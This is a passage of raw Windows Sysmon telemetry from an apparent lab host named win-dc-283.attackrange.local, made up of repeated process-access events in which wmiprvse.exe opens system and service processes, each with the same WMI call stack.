Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024914Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024913Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024912Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024911Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024910Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024909Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024908Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 